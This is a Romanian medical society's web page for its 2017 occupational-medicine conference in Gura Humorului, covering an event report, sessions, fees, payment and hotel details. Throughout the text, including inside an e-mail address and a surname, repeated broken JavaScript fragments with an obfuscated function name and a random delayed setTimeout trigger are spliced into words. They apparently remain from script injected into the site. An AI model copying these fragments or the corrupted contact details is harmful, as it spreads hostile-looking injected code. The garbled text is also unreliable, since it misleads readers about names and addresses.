Conferinta 2017

Societatea romana de medicina a muncii

www.srmedicina-muncii.ro

CONFERIN?A NA?IONAL? DE MEDICINA MUNCII CU PARTICIPARE INTERNA?IONAL?

GURA HUMORULUI

HOTEL BEST WESTERN BUCOVINA

– 25 – 27 MAI 2017 –

cu tema:

“BUNE PRACTICI ÎN ACTIVITATEA MEDICULUI DE MEDICINA MUNCII”

Conferin?a Na?ional? de Medicina Muncii cu Participare Interna?ional? s-a desfasurat in perioada 25 – 27 Mai 2017 la Gura Humorului, in Bucovina, intr-un cadru pitoresc si ospitalier. Conferinta a fost organizata de Societatea Romana de Medicina Muncii in parteneriat cu Disciplina Medicina Muncii a Universitatii de Medicin? ?i Farmacie”Carol Davila” Bucure?ti, Agen?ia European? de S?n?tate ?i Securitate în Munc? – Bilbao- Punctul Focal EU OSHA – România, Colegiul Medicilor din România, Colegiul Medicilor Suceava si S.C. Alfa Med Stoleru S.R.L.

Tema principala a conferintei “Bune practici în activitatea medicului de medicina muncii” a avut ca scop principal aducerea la masa dezbaterilor a specialistilor in domeniul medicinei muncii, lucrarile si discutiile concentrandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andu-se pe managementul cabinetului privat de medicina muncii, aptitudinea in munca, identificarea si evaluarea riscurilor profesionale, perspectiva angajatorului asupra medicinei muncii.

Evenimentul adresat medicilor specialisti si primari de medicina muncii, medicilor rezidenti in specialitatea medicina muncii si medicilor de specialitati inrudite a reunit 300 de participanti din tara si din strainatate. Aspectele de actualitate prezentate au generat dezbateri si abordari solid fundamentate, dintre cele mai diverse, in domeniul sanatatii si securitatii in munca.

Importanta conferintei a fost subliniata prin ideile exprimate de invitatii de prestigiu care au luat cuvantul, printre acestia numarandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andu-se reprezentanti ai mediului universitar din tara, din Ungaria si Republica Moldova, colegi din Marea Britanie, managerul Punctului Focal EU OSHA – România al Agentiei Europene de S?n?tate ?i Securitate în Munc? – Bilbao- si presedintele si vicepresedintele Societatii Elene de Medicina Muncii.

In data de 27 mai 2017 a avut loc Adunarea generala a membrilor Societatii Romane de Medicina Muncii prilej cu care a fost prezentat Raportul de activitate al Consiliului Director in perioada 2016-2017. Au fost stabilite prin vot: marirea cuantumului cotizatiei de membru S.R.M.M. incepandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and cu anul 2018 si coordonatele urmatoarelor evenimente stiintifice din 2017 si 2018.

A fost prezentat noul format al Revistei Romane de Medicina Muncii si pasii parcursi in vederea indexarii in baze de date internationale.

A fost lansata membrilor societatii invitatia de a transmite propuneri de modificare a Statutului Societatii Romane de Medicina Muncii catre secretarul S.R.M.M.

 

Conferinta Gura Humorului – Anunt 5

Program Conferinta

AL 5-LEA ANUN?

SOCIETATEA ROMÂN? DE MEDICINA MUNCII

În parteneriat cu:

UNIVERSITATEA DE MEDICIN? ?I FARMACIE”CAROL DAVILA” BUCURE?TI

DISCIPLINA MEDICINA MUNCII

AGEN?IA EUROPEAN? DE S?N?TATE ?I SECURITATE ÎN MUNC? – BILBAO

PUNCTUL FOCAL EU OSHA – ROMÂNIA

COLEGIUL MEDICILOR DIN ROMÂNIA

COLEGIUL MEDICILOR SUCEAVA

S.C. ALFA MED STOLERU S.R.L.

ORGANIZEAZ?

CONFERIN?A NA?IONAL? DE MEDICINA MUNCII CU PARTICIPARE INTERNA?IONAL?

GURA HUMORULUI

HOTEL BEST WESTERN BUCOVINA

– 25 – 27 MAI 2017 –

cu tema:

BUNE PRACTICI ÎN ACTIVITATEA MEDICULUI DE MEDICINA MUNCII”

SESIUNI:

  • ASPECTE LEGATE DE PRACTICA MEDICINEI MUNCII. MANAGEMENTUL CABINETULUI PRIVAT DE MEDICINA MUNCII

  • APTITUDINEA ÎN MUNC?” – O PERMANENT? PROVOCARE ÎN ACTIVITATEA MEDICULUI DE MEDICINA MUNCII

  • IDENTIFICAREA RISCURILOR PROFESIONALE ÎN PRACTICA MEDICINII MUNCII

– APLICA?IE PRACTIC? – FI?A DE IDENTIFICARE RISCURI PROFESIONALE

  • EVALUAREA RISCURILOR PROFESIONALE ÎN PRACTICA MEDICINII MUNCII

– APLICA?IE PRACTIC? – CHESTIONARUL DE EVALUARE A RISCURILOR PROFESIONALE

  • MEDICINA MUNCII DIN PERSPECTIVA ANGAJATORULUI – ÎNTRE LEGE ?I “TOCMEAL?

  • SESIUNE DE POSTERE – VARIA

INFORMA?II GENERALE

Organizatorii

CONFERIN?EI NA?IONALE DE MEDICINA MUNCII CU PARTICIPARE INTERNA?IONAL?

v? a?teapt? la Hotel Best Western Bucovina, Gura Humorului,

în perioada 25 – 27 mai 2017.

Deschiderea lucr?rilor conferin?ei va avea loc în data de 25 mai 2017, la ora 09.00 în Sala Tisa.

Informatii generale

Limba oficial? a conferin?ei este limba român?.

ÎNREGISTRAREA PARTICIPAN?ILOR

Participan?ii sunt ruga?i s? se înregistreze din timp prin completarea formularului de înregistrare  pentru conferin??, formular ce poate fi desc?rcat de pe site-ul Societ??ii Române de Medicina Muncii.

Taxa de participare la conferin?? pân? la data de 15.04.2017

Taxa de participare la conferin?? începând cu data 16.04.2017

 

 

380 lei

450 lei

Membri SRMM

Medic primar ?i specialist

450 lei

520 lei

Nemembri SRMM

Medic primar ?i specialist

200 lei

250 lei

Membri SRMM

Medic rezident

250 lei

300 lei

Nemembri SRMM

Medic rezident

380 lei

450 lei

Membri SRMM

Medic înscris la a doua specialitate

450 lei

520 lei

Nemembri SRMM

Medic înscris la a doua specialitate

300 lei

300 lei

Medici pensionari

Medici pensionari

300 lei

350 lei

Persoane înso?itoare

Persoane înso?itoare

Taxa de participare la conferin?? include: accesul la ceremonia de deschidere, lucr?ri, mapa conferin?ei, pauzele de cafea, accesul la zona de standom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anduri, excursia organizat? la obiective turistice din zon?, cina festiv?.

Taxa de participare pentru persoanele înso?itoare include: admiterea la ceremonia de deschidere, la zona de standom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anduri, excursia organizat? la obiective turistice din zon?, cina festiv?.

Confirmarea înregistr?rii:

Dup? efectuarea pl??ii, v? rug?m s? transmite?i obligatoriu o copie a ordinului de plat?/ chitan?ei de plat? a taxei pe adresa de e-mail: claudia.handom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andra@gmail.com.

La efectuarea pl??ii v? rug?m s? specifica?i „tax? participare – Conferin?a Na?ional? de Medicina Muncii, Gura Humorului, 25-27 mai 2017/ tax? participare pentru persoan? înso?itoare, precum ?i numele participantului / persoanei înso?itoare”.

Pl??ile se vor efectua:

– în contul Societatii Române de Medicina Muncii

Adresa: Bucure?ti, str. Foi?orului, nr. 11, bl. F7C, sc. 1, et. 6, ap. 26, camera nr. 2, sector 3

Cod fiscal: 16571712

IBAN: RO25BTRLRONCRT00N0127302, deschis la Banca Transilvania, sucursala Bucure?ti Obor

– în numerar la Clinica de Medicina Muncii, Spitalul Clinic Colentina, Bucure?ti la Dr.Claudia Handom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andra, trezorier S.R.M.M.

CREDITE EMC

Conferin?a este creditat? de c?tre Colegiul Medicilor din România.

CAZARE

Cazarea nu este inclus? în costul taxei de participare la conferin??.

Hotel Best Western Bucovina/

CASA DE BUCOVINA CLUB DE MUNTE SA

Piata Republicii Nr. 18
725300 Gura Humorului
Suceava, Romania
Tel. +4 (0230) 207-000
Fax +4 (0230) 207-001
reservation@bestwesternbucovina.ro

Un num?r de 70 de camere sunt la dispozi?ia participan?ilor la conferin?? la pre?ul negociat de 160 lei/noapte- camera single ?i 190 lei/noapte camera dubl?. Pre?ul include micul dejun.

Rezervarea ?i plata caz?rii se realizeaz? individual de c?tre participan?i, cu specifica?ia de a face precizarea c?tre personalul hotelului c? sunte?i participan?i la conferin??.

DATE DE CONTACT

Clinica de Medicina Muncii, Spitalul Clinic Colentina, Bucure?ti

?os. ?tefan cel Mare nr. 21, sector 2

Tel/fax: +4 021/318 06 51

DESCARCA FORMULAR DE INSCRIERE